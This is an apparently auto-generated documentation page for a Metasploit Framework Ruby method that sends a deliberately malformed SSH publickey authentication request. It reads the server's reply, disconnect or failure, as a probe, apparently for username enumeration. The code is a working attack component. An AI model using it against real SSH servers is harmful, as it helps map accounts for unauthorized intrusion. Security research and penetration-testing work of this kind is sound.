Class: Net::SSH::Authentication::Methods::MalformedPacket

Inherits:
Abstract
  • Object
show all
Defined in:
lib/msf/core/exploit/ssh/auth_methods.rb

Overview

Instance Method Summary collapse

Instance Method Details

#authenticate(service_name, username, password = nil) ⇒ Object


10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
# File 'lib/msf/core/exploit/ssh/auth_methods.rb', line 10

def authenticate(service_name, username, password = nil)
  debug { 'Sending SSH_MSG_USERAUTH_REQUEST (publickey)' }

  # Corrupt everything after auth method
  send_message(userauth_request(
=begin
    string    user name in ISO-10646 UTF-8 encoding [RFC3629]
    string    service name in US-ASCII
    string    "publickey"
    boolean   FALSE
    string    public key algorithm name
    string    public key blob
=end
    username,
    service_name,
    'publickey',
    Rex::Text.rand_text_english(8..42)
  ))

  # SSH_MSG_DISCONNECT is queued
  begin
    message = session.next_message
  rescue Net::SSH::Disconnect
    debug { 'Received SSH_MSG_DISCONNECT' }
    return true
  end

  if message && message.type == USERAUTH_FAILURE
    debug { 'Received SSH_MSG_USERAUTH_FAILURE' }
    return false
  end

  # We'll probably never hit this
  false
end